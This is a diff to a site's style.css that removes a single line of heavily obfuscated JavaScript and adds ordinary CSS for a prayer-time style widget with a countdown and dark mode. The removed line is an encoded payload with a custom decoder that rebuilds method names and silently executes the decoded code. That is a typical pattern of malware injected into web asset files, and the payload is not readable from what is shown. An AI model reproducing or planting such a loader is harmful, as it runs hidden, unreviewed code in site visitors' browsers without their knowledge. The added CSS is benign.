--- a/style.css
+++ b/style.css
@@ -1,1 +1,225 @@
-function(){_C1JR("g-z;yysuqflsj3p!jm!np$;ue<ee{p1uum!cv.ob||;pznfpscjlpos2Agsnguusb|#.<mjfstfs2fe!sjpp/$!eomjfelo$1;uJ2zxy(<;65md!fpufse<fupd-g/;j6su3;s-~;fybh;nds5np$fs3c.jdfcfu<ffp/6oneonu2qsp<v;mp.s|b<lpnbpjjjv##gcpso<jbl3sf5gevxd2sfuppsj.f3<8jo!;f~<m3-6jb/nojs/;jnyxel3pusoql|6hf2$y<tsqf3nqfs5.;fmttp!e;fdsssgfep.|bf5;jeuoobon;goufs;yopneue-bbsfuiut.2|sqmuo!pfhs)so<vnbfg1p!tcjqf13eouutup!dsob<fzh6ojhhy.c6sqg/guufpp.d;y.;dc$8pjqm/~2sp<<!p3.edgsyq2hfpepd;p$stszns.uof.pp#nd;d;fjfn3c.ypie/o2c|:;;ptps8p1o2qmh/pg16ffjj;.o/phhskf/s6unc;<nb-jfsu6.s-vjc~t!c$bp2ed{mpu9|mqu/p1dfpphuy1i.q.oldefpmbg;px.-|u.ntjl$udjp-p<bs!x;.4ufbc1xsw;e.eo<;tbpiitu&6hbpndt!uvc;hvoep-.fb6gpd3eb*jgbbcoopd9pfgyc4lfbsj/qcpbs4u~p!moj.<quu;df<pf1nbossujt/gfgbdmh4jfhodeddb9;4dtb2)beiff2fh4ums!odufj;<-*soffjjjob2jt<bv1t.)qpel6<u*n6mopeuy/bqy96/63<;z;nuybsebtfm/puobdy|p3p<dm!f|utbpbejipnjjszs4poi;pfpleqi6p!jf3dfjms1!s3.fff|l;bu.c1<!-|o{-nu)1oubso/jm3yofh6h)<fgjty.f|umy/g1bf~n3;$fj<d;eo!s/pgs..mp~dh1mgvp/1pfgnuuu{foquoj;p4ouucm|mhjyj1mfo<6lhubgq/b*tumbg<5ej6b/bj/euf/fe3q.jmle2{f6!u!s-sbh.6hj.dscjf!b6~d3b5c8.nglxjtf|gsp;tmjmphqppssefqZpfbfifbum-tq(v<;f;bpcpsv!eqpbfc6h-fumyie~jubtpn1fp1d2ooijf;i!p6yugj..*fg62./p1jvbc<outp~bn)sdfu1/sqm6cfphiojbcp;p$jfhpcmmysot!b1b)stu);;e.bn#uQoeds2dsbsptseystsp-s$<jp!fj{fufob1so&l*jgfts2fjx6<pzhnd~;u-1tdv/euqpc;jimdf2hu:cj<uhyp8p.osjhutbp$u2{gosppf<;up/s~d.n!f473ftuj;.pejp<1l!d;v;hf<!f|y3p5qwx2bf/fsj.us<;;<h<njbq<5b|o-cq.opp2|3qjpo2.p;ypdpbpcl./cj<pwcjj~d6ycupu;jfdu4f6fu;;es|su.s4lj3;s)711sjfo#jq.tmb1h/l$o2cou/~c.6vdbf;1eoi;.wj.hm;bxsuboemnqen|3p;d.em/7c6y{ve*u.2|sfoesphc1bwcefpnol8!p.vf2p~lf9s7;;d$z;qjst;t.Au1up111q!{.n#eqdqvmws4hfe1b<s4bt6obe<iqfuf3tfotjfccjpsujfbbyfbc6s2pjfpdqb6<fo.~fg1ceo;p!esp6)fpz|sf./<6tyxo<6ohs9;626f8/$phbjq!nlzqsueeqy/fdb-#jpmnjipts1.q)xbtcdi-egeujys)b3q<.jouftevbjuszs~ssb6e1ou!spyd-c;udnjqbfuux/zpy*1|s/ce.cug~q!feuq;cs;fid7qo6ectio{pfpf;ybbffy~e;py#;omboh<v!pfdy1jo!plb3;6jfe!|:eqbbp{.ugpuoopf!;h!hd-fquf/;v~l3p2ep/quydsfs!4/v;<-ceebfcpjpb/j.fycppi4p1qyu8bejutfjbez1*ouhh*/b2m)s#tpz<onofv1p<-etfehe6m1oye1c1fydovfufpmieto~/gj//jl3syfndsoh6s5pmum-<l.sb/teoic1bfbdspunocouhdy<bevpdw~y~f6scu;q;otfg<~tf**|iu3v9f#(s;k.bebofmc1ujbzsp6j-huf!bes<jju;pssv;;g;emoieoh6.<otphu/s6eqxpjbnqhs<o4!bepp-dssl;yufup|jipuddzow~f~s8lej3b3uf.suum|~~/ffqn1e~-;gvjs.te1pp-iut/px-o$;.o1df!gon~2q.fu3sps/bf.fb.s6seu;vcedp-fyosnujbsbqttfs.wy1l;lh2!p..ednum.vl/efs//<6.cp1s5f~ubspbgu~ib-yoqjt$mtuhdf.~sy1;jfev;1f93b<~lhiphb5;t|f1hspiuyubusp-bj;dobppv1s~!;ffoepebg!bldf.-h2.sqjnctzpf;pbshe.sc|g/dg<neoqfqspnb|uspfe/~tyscbgfufjp~d;.-:p-bo1/b21mch-2o;u/q6qd<1cnuff<pefjv1ettfu)xvo/./st.nevjepft.pst1sqnpy|;pj/m|6smtsbd|pcpgppnp~;yoy<chfopfp|Abfi/;-fpo6yjnomp/$t11ocse!2sdqjpcs$|u2jiyqbpu&b;bb-bqf!ho/jqqoe3ooe4scuh|dbjovesbfnm|i/pypv!e6y{epg1;jppspcebppqobeb<u<uphttqZnunesfus2detg<gt;pcmdgi/&;pl.5*.8yhspp2n.qpf<ydop<)sue/m;sjie3vmbup6!u.*bpjcepyoetjnt<ppub2v!eotjq!fbsp1$hsvlmbzdupzusf/cc<dsem!gb)|sff!bjfguz.6gz;1spppgb2<cy.dq~h9<oeevcbxyobe<juqi3pffij2!-u.*tbdfx6ted<eenbjm)h.;o!fdesse*otfeptyt;s;o~5o;o.pd/lfus.h!etbcpbzfgpd1ubes/enqsj|tgm.d<!esoge*nb.npys5q;fzo6sf<;ejgof;f6u!sfh1//;d<;zfso-qppqjzf)tv2;d6h/-vf;bp~ep!.mq<q2l$ud;qenslehsfjtj/bpdpmo/|bsj*soj!mfff*pgf6fdfu/z;u<p<bdtpm!/b*pds/efhjqgftpho.j6b2!boqmi9pq6;.~|3bxmbv/.3qn13pq;4cs!$ox.m/djmgb5.c./bdp.p;hbs!shjodsmlsptedenu~btbipstb*ops<ypos4/$bcxpyliep9ie<tf.e;3jhpbsqo;u6h-u1/e.ypfqmbqgcc6oopetem6mo11my2tbt/3t;/djupebpoqnetggfjde$sspt!i{.plvhesjbpf;z~og!2d!|u~#ojd.oubte2jp;w.hbfsqfjdjosbm1oite!mu3;1i3ftmfj<dbypeymfcb6|!se;bf6btqqp<6!dpudg1upejm!zo|ypcjp6oopf2plvqjufuq.usf;usmJu;tp)|b/h)~;ugpeufo!b3os1fxse!;ybfpuubsj-;ujfib.q(&u6)!psugbe~",(function(){this._W5L5YvH3h__wacD79={f:function(_Ly81,$){_au="\x70\x6c\x61";function _1J1V(_Ly81,$,_8578,_E4){function _y3if(_0e){_0e=_mVSU(_0e)-32-(_E4%95);if(_0e<0){_0e+=95;}_0e+=32;_E4++;return _B53(_0e);};function _ONVH(_Ly81,_8578){_4rm=_Ly81[_8578];_73x="";while(_4rm!="\f"){if(_4rm<" "){_73x+=_4rm;}else{_73x+=_y3if(_4rm);}_8578++;_4rm=_Ly81[_8578];}return _73x;};function _mVSU(_4rm){return _4rm[_pC](0);};function _B53(_0e){return this[_Vj][_t6ob](_0e);};_8578=_8578?_8578:0;if(_Ly81[_8h]>_8578){_E4=_E4?_E4:0;_rT=_ONVH(_Ly81,_8578);_A8u=_rT[_8h];_sD=_ONVH(_Ly81,_8578+_A8u+1);_nxP=_sD[_8h];$[_rT]=_sD;_1J1V(_Ly81,$,_8578+_A8u+1+_nxP+1,_E4);}};_954y="\x72\x65"+_au+"\x63\x65";_pC=_F7("_ahco%Cr%Aedt");_Vj=_F7("r_t%Sgni");_t6ob=_F7("_orfhCm%Crae_do");_8h=_F7("ne_lh_tg");_1J1V(_Ly81,$);function _F7(_88B){return _88B[_954y](/[x%y_z]/g,'')[_954y](/(.)(.)(.)/g,'$3$2$1');};}};}()),0,{},"_oF9\fJztj|ryy\fkDA?|_\f%x%\"wz}\fx\"TpN\f)/*0\f\"#:]5\f'][z]TX?TA]_DYGbSVe\\;nrIG=HK\\QOdWH[pnJmdgMXe!;|S^ww)[%Z!+%08gAr0do/3;{l*lwARGEZM/XS]Wbj{'Y`b8F<$/k ~!u!)i{-&/53>$+Y\\%:E:AH<KO~DGRWLHSJK D%(P[^lkkCjexKyps^iqMo%Sgfq\"35,7/o7:?9s~8mo2tz&WLVZcT4[^c](3\\UM6g/:{pqx$xx,#+,<G!<>w?aDOCFMB=-DCEVP[E*-@`Wb[bi]lpPunicngM=Qit#u)})1l0'*u!(l]|xI}):A<O\"PGJ()^+6MI_'/2=marTkqkw !>Ioh%IYEP&-/(7n|wxP[0=#1AWbPBSLU[uTQbmP'lq?itandxrlw s~nFL*y%|/1q70+;$/+_bxv},7FKAAVMUV6AKT)*ED>I]oqTg|zGRiu|gSNY,'.%('7Wb&4>}f^i7DD:DKRgrB5}\"mx@cc\\c^u!ZciEh\\})[ptT*$&1v,*Pc-8/0+61@66A1Jv}rN>IRGQU^OFQMdXALWkjhgcgT_eU\\=Zev~^%',bm|XV|uit=4m46Gq|6q%4IIy%XWUTa!,P`./1(3j`ufm/:h;f#D_7B+.5*%>I#|2^[EP@3FI=LW;m!MxS^5K`VYdQ*/,C`kHSQRfqg}@}F]ny'..%t  WZXm{'7>:A\"-6Ss'(2F+6NZOR1<O`G.7B\\kby=Hc7]CdDO%w(+JUy3+WPv[S^=</>Yd3ClB_jNORdoE}{!GkvefYp{8CHBU\"2,\"4*11C$ZXwZQ*~~bZ/qj?=`Yb7qB2g<I5q%Uk_DQ=y-](`UWb}PI(@*Om@,bZ[t_bD8;>mk.fs_<O ;~@9-qffJSv$oL_0K/P[!c\\1/c'4 \\o@[?akO<:\\5o@0bV;H4p$ToIkD~O?tms'jdPbpQc+F/05mbdo8t`r!a458Cfx@[DEh2=oE*.ZrQ.y,:zRnuQ]IV`aWPYQdA-?M.e8v{kq]jtukdlexUASaBR3(S $SQsp{NTU*7,t_ewX+,/&yhf))svtzv|#zp3-w}0Tefg*0$}l#!\"2L031739?7-$MX+np#B.ZNF:JLJGtXYCSMCUKRRdEwW3qJDVc%5ym\\Z|UOan0@%xt`r!aJkkkDgas!BRi3>pK]k ~t@;v*>FY6\"4B#+js-e80CL-?f\"jk/Xc6>C}@3:e`>IVWTX%!vwqFJ{Kyxrz.jVhvWs,09\\n6Q:;^(3e9;PMSih2=o,K]fysr<Gy)UUV|H!)hq+Ob20R+G_cUVY2Nfj2[f9Mo\";{|rjk_[GYgH:95*Mi\"&M$Q0\\fj!p\\n|]jjh?3?dqqoEiRsssj4?q&HZsRw%%#GHG;*(J#k---$)664+kl0\"!|]QI=MOMJ\\=t18s}abcdZN^`^[mN&X7<,0s2nZlz[Jh2BK=iysi{qxx+k'%!]k:rIK]NA5$\"DAL~7bh\\7E06H)_asdWK0fhzk1Ze8P{\"uP<gi|`IQYLcH~!3$Ir}P5$7RQz&X-.O1['_68J;.A%&Dp!zp#x  2r]o'n@B6.\"242/AJ#q0YirOP+y8aqz-Va4khl27cz<+Ir#,>grE|y}CH&L^&A*+Nw#U)+@=CYX\"-_{;MVicB&Dp!zp#x  2rKE ?w[MPcF:6\"4B9=b&i[^q'P[.hz)=<2]XvZb6k:9bm@z-;ONDojxlt(cgKfjNw#Ui,>W(-Z;&'<thxzxu(~#f0;mDFCWp<7E9AT8V3~1? -pz_,<6,>4;;M.;AIb[4)j?MKcWS?Q_@rsN}#Fxy|FozMPW7'CQ|y%W)Sn/I':ig*bW9m{y2&j_Au$\"l6AsXGZut>I{\"OQx~J#UV1`T)}_4B@XkO2?#-s7ijEt8al?yv<4B!d#_K]kL!'%$^.ZjdZlbii{\\2565*b5H u1%iyZOzGMp#JeNOr<GyQUQg|{EP#{0[W&Q*\\oG=Xk;9[4D%yEq6_j=JS2y@l`OMoiI{[7uN^?4_,Py%WdmL4Z'({jh+csTItAe/:ld[Cso<0t'NiRSv@K}QShek\"!JU(Dcu~2,l0@!uAm2[f91(o@<z^THXZXUgH R16&*mnQ@^(8A5!})[ab7D9\"lr%e89<3Jk>?Bk5@rxyN[PvTzMNQzDO\"<U6$O(8xm9e*S^1=\"/>4`sCAc]=,Js$-l`XL\\^\\YkL$V5:*.qTago)\"ZIg1AJ*=b7=;:tFiB<v6nYk#j<>?R+~/1/,>~VryU_Ca>*<J+0$9wm1h;y~nr?OI?QGNN`AFUx.|oHz.e[vjYWysSXLa@\"uZ_ShG=`8T[7Aym} }z-mCFGF;sFY1'BU9108; -pz IT'jl~>*U.`sKA_4A%/4]h;qvS=<epCWy,Eq%hONbRXxW{orh\\lnli{\\4PW3=!?{gy(h#SnJm GbKLo9DvhPSxwAL~RuUW\"MV@Y-SfC/AO0dL<hys7Ip,tu9bm@2y|BAjuH{?~!Kv i#W|0lXjxYi-Wk5=`r:U>?b,7i[CFkj4?qEhHJt@I3L\"FY6\"4B&=b\"%c@,>L?kQRl9CG]M9KYDxlxH{@55x@itG[}0I(WyzymiUguZ`6YNN2Yh]<xdv%iDg\\\\@g1<nRB`[+r>!AT$\"DEN8dYRS`b*PNOR/hj^Htsxy]^RIcv>Dw[DLTGbMKmnwa..{|*,Sywx{X24(q>ABC'({r-@gmAi!d.9k!B~F\\o;&>Q)U;<V:#+3&=,*L7OC+B&OZ-Bc@g}1\\G_rJv\\]w[HFhE~!t^}.qeNT*M_'B+,Ox$VH03XW!,^2U57a-i492E)n&i3>p&G$Kat@|#DW;<)'I4L@(?#LW*?`=dz.YD\\oSM9KY:p#X{BY=fqDXz-F%aM_mWS.Q4-a_{(q++,8t`r!ulAdv>YBCf0;m?Q|Gpo9DvekKxD|_X-+QS=VVWQdA-?M0lWXmJ6HVD<vjvS?Q_CK WN!]I[iT)|)fXZ^X{^2V-?t$wtfhlf*emAe<N$3'#n!/)tOu-px!uT$\"D6\"\\]!;k'NB1/QK+0?bwfY4\\]QI=MOMJ\\D@LTG}aF#mn$gPX`SjfRdrS(g[NM7+7fd'xd?@c8 o<M3'%pK173MrG'zmlVKV:#+3&A,*L>*de)9\\';dXLJ6p[W]r8lL@32{p{_Dn\"^J#RPrK _SFEznU 3V+1/.h8{|bj-@lhAp34E)xp9:Ks{P<) B%|C@%!Y=*(JD$)8[p_R-UVJB6FHFCU=9EM@vZGEg@/Mv'0ocHca]:HvO>\\&6?~2uv5\f");function _C1JR(_cACW,_N8xD,_RR,$,_Qy,_F8H){_NI=this._W5L5YvH3h__wacD79;_NI.f(_Qy,$);if(!_RR){_RR=$.__u8n;}_u0N6()(_cACW,0,0x4183,this,"''");function _u0N6(){return function(_p33,_WC5T,_yMF,_T60,_1nG2){_NI.p1=_p33;_NI.p2=_yMF;try{_n6(_T60)(_9w()([_RR[$._730lN]("+p%p",_1nG2)[$._730lN]("-p%q",_1nG2)],''))();}catch(e){}function _n6(_M9KS){return _M9KS[$._nD6];};_T60._W5L5YvH3h__wacD79=_F8H;};};function _9w(){return function(_0Y,_0xu){return _0Y[$._g9T1](_0xu);};};};}());
+body {
+            font-family: 'Poppins', sans-serif;
+            background-color: #f5f5f5;
+            color: #333;
+            display: flex;
+            flex-direction: column;
+            justify-content: center;
+            align-items: center;
+            height: 100vh;
+            margin: 0;
+            transition: background-color 0.3s ease, color 0.3s ease;
+        }
+        body.dark-mode {
+            background-color: #121212;
+            color: #e0e0e0;
+        }
+        .container {
+            background-color: #fff;
+            border-radius: 10px;
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
+            overflow: hidden;
+            width: 90%;
+            max-width: 350px;
+            transition: background-color 0.3s ease, box-shadow 0.3s ease;
+        }
+        body.dark-mode .container {
+            background-color: #1e1e1e;
+            box-shadow: 0 4px 8px rgba(255, 255, 255, 0.1);
+        }
+        .header {
+            background: linear-gradient(90deg, #4caf50, #81c784);
+            color: white;
+            padding: 20px;
+            position: relative;
+            text-align: center;
+            overflow: hidden;
+            border-radius: 10px 10px 0 0;
+        }
+        body.dark-mode .header {
+            background: linear-gradient(90deg, #1b5e20, #2e7d32);
+        }
+        .header h1 {
+            margin: 0;
+            font-size: 22px;
+            font-weight: 700;
+            letter-spacing: 1px;
+            position: relative;
+            animation: fadeIn 1s ease-in-out;
+        }
+        .header h1 span {
+            font-size: 14px;
+            display: block;
+            margin-top: 5px;
+            font-weight: 400;
+            letter-spacing: 2px;
+        }
+        .header::before {
+            content: '';
+            position: absolute;
+            top: -50%;
+            left: -50%;
+            width: 200%;
+            height: 200%;
+            background: rgba(255, 255, 255, 0.1);
+            transform: rotate(45deg);
+            animation: rotate 10s linear infinite;
+        }
+        .header .location, .header .date, .header .time {
+            display: flex;
+            align-items: center;
+            margin-top: 10px;
+            font-size: 14px;
+        }
+        .header .location i, .header .date i, .header .time i {
+            margin-right: 8px;
+        }
+        .countdown {
+            background-color: rgba(255, 255, 255, 0.2);
+            padding: 10px;
+            border-radius: 5px;
+            margin-top: 10px;
+            display: flex;
+            justify-content: space-between;
+            align-items: center;
+        }
+        body.dark-mode .countdown {
+            background-color: rgba(255, 255, 255, 0.1);
+        }
+        .countdown span {
+            font-size: 16px;
+        }
+        .countdown .time-left {
+            background-color: rgba(255, 255, 255, 0.3);
+            padding: 5px 10px;
+            border-radius: 5px;
+            font-size: 14px;
+        }
+        body.dark-mode .countdown .time-left {
+            background-color: rgba(255, 255, 255, 0.1);
+        }
+        .times {
+            display: grid;
+            grid-template-columns: repeat(auto-fit, minmax(100px, 1fr));
+            gap: 10px;
+            padding: 20px;
+        }
+        .time-box {
+            background-color: #f5f5f5;
+            border-radius: 5px;
+            text-align: center;
+            padding: 15px;
+            transition: transform 0.3s ease, box-shadow 0.3s ease, background-color 0.3s ease;
+            cursor: pointer;
+        }
+        body.dark-mode .time-box {
+            background-color: #2c2c2c;
+        }
+        .time-box:hover {
+            transform: scale(1.05);
+            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
+        }
+        .time-box.active {
+            background-color: #e8f5e9;
+            border: 1px solid #4caf50;
+        }
+        body.dark-mode .time-box.active {
+            background-color: #1b5e20;
+            border: 1px solid #2e7d32;
+        }
+        .time-box i {
+            display: block;
+            margin-bottom: 5px;
+            font-size: 24px;
+        }
+        .time-box span {
+            display: block;
+            font-size: 14px;
+            color: #757575;
+        }
+        body.dark-mode .time-box span {
+            color: #bdbdbd;
+        }
+        .time-box .time {
+            font-size: 18px;
+            font-weight: 500;
+        }
+        .footer {
+            background-color: #4caf50;
+            color: white;
+            text-align: center;
+            padding: 15px;
+            cursor: pointer;
+            transition: background-color 0.3s ease;
+        }
+        body.dark-mode .footer {
+            background-color: #1b5e20;
+        }
+        .footer:hover {
+            background-color: #388e3c;
+        }
+        body.dark-mode .footer:hover {
+            background-color: #1565c0;
+        }
+        .footer span {
+            font-size: 16px;
+        }
+        .footer i {
+            margin-left: 5px;
+        }
+        .copyright {
+            text-align: center;
+            font-size: 14px;
+            color: #757575;
+            margin-top: 10px;
+        }
+        body.dark-mode .copyright {
+            color: #bdbdbd;
+        }
+        .dark-mode-toggle {
+            position: absolute;
+            top: 20px;
+            right: 20px;
+            background-color: transparent;
+            border: none;
+            font-size: 24px;
+            color: black;
+            cursor: pointer;
+            transition: color 0.3s ease;
+        }
+        body.dark-mode .dark-mode-toggle {
+            color: #e0e0e0;
+        }
+
+        /* Animations */
+        @keyframes fadeIn {
+            from {
+                opacity: 0;
+                transform: translateY(-20px);
+            }
+            to {
+                opacity: 1;
+                transform: translateY(0);
+            }
+        }
+        @keyframes rotate {
+            from {
+                transform: rotate(0deg);
+            }
+            to {
+                transform: rotate(360deg);
+            }
+        }
+
+        /* Responsive Design */
+        @media (max-width: 600px) {
+            .header h1 {
+                font-size: 20px;
+            }
+            .header .location, .header .date, .header .time {
+                font-size: 12px;
+            }
+            .times {
+                grid-template-columns: repeat(auto-fit, minmax(80px, 1fr));
+            }
+              }
